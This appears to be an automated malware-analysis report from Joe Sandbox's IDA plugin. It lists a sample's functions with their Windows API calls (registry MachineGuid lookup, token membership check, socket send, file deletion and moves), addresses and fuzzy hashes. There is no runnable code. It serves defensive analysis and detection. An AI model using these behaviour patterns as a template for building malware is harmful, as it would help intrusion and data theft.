Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
